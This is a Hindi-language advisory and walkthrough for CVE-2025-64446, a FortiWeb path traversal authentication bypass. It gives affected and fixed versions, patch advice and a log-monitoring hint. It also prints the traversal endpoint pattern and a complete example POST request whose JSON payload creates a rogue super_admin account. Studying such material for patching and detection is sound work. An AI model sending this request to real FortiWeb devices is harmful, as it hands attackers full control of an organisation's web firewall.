
CVE-2025-64446

एक गंभीर अप्रमाणित भेद्यता जो दूरस्थ हमलावरों को FortiWeb उपकरणों पर व्यवस्थापक खाते बनाने की अनुमति देती है।
CVE-2025-64446 FortiWeb वेब एप्लिकेशन फ़ायरवॉल प्रबंधन इंटरफ़ेस में एक गंभीर सापेक्ष पथ ट्रैवर्सल भेद्यता है।
एक अप्रमाणित दूरस्थ हमलावर इस दोष का शोषण करके प्रमाणीकरण को बायपास कर सकता है और पूर्ण विशेषाधिकारों वाले नए व्यवस्थापक उपयोगकर्ता बना सकता है, जिससे उपकरण पूरी तरह से समझौता हो सकता है।
सिफारिश: जितनी जल्दी हो सके नवीनतम पैच किए गए संस्करण में अपडेट करें।
लक्ष्य पहचान
हमलावर सार्वजनिक रूप से उजागर FortiWeb प्रबंधन इंटरफ़ेस (आमतौर पर HTTPS पोर्ट 443 या 8443 पर) के लिए स्कैन करता है।
दुर्भावनापूर्ण अनुरोध तैयार करना
शोषण का मूल एक सापेक्ष पथ ट्रैवर्सल (../) है जो एक विशेष रूप से तैयार URL के साथ जुड़ा होता है जो एक आंतरिक अप्रमाणित CGI एंडपॉइंट तक पहुँचता है।
भेद्य एंडपॉइंट पैटर्न:
/api/v2.0/cmdb/system/admin?.../../../../../../cgi-bin/fwbcgi
शोषण भेजना
हमलावर एक नया व्यवस्थापक खाता बनाने के लिए JSON पेलोड के साथ एक एकल POST अनुरोध भेजता है।
शोषण अनुरोध का उदाहरण:
POST /api/v2.0/cmdb/system/admin%3f/../../../../../cgi-bin/fwbcgi HTTP/1.1
Host: target-fortiweb.example.com
Content-Type: application/json
{
"name": "hackedadmin",
"password": "AttackerPass123!",
"access_profile": "super_admin",
"type": "local"
}
सफल शोषण
यदि सफल होता है, तो FortiWeb बिना किसी पूर्व प्रमाणीकरण की आवश्यकता के नया व्यवस्थापक खाता बना देता है। हमलावर फिर नवनिर्मित क्रेडेंशियल के साथ लॉग इन कर सकता है और WAF का पूर्ण नियंत्रण प्राप्त कर सकता है।
प्रबंधन API पथ को ठीक से स्वच्छ करने में विफल रहता है, जिससे अनुरोध वापस पुराने fwbcgi बाइनरी तक पहुँच जाता है, जो कुछ संचालनों पर प्रमाणीकरण लागू नहीं करता।
fwbcgi, ../, या असामान्य व्यवस्थापक निर्माण प्रयासों वाले अनुरोधों के लिए लॉग की निगरानी करेंकेवल शैक्षिक और रक्षात्मक सुरक्षा अनुसंधान उद्देश्यों के लिए।
साइबर सुरक्षा समुदाय के लिए ❤️ के साथ बनाया गया
अंतिम अद्यतन: अप्रैल 2026
| उत्पाद | प्रभावित संस्करण | स्थिर संस्करण |
|---|
| FortiWeb 8.0 | 8.0.0 – 8.0.1 | 8.0.2 और उससे ऊपर |
| FortiWeb 7.6 | 7.6.0 – 7.6.4 | 7.6.5 और उससे ऊपर |
| FortiWeb 7.4 | 7.4.0 – 7.4.9 | 7.4.10 और उससे ऊपर |
| FortiWeb 7.2 | 7.2.0 – 7.2.11 | 7.2.12 और उससे ऊपर |
| FortiWeb 7.0 | 7.0.0 – 7.0.11 | 7.0.12 और उससे ऊपर |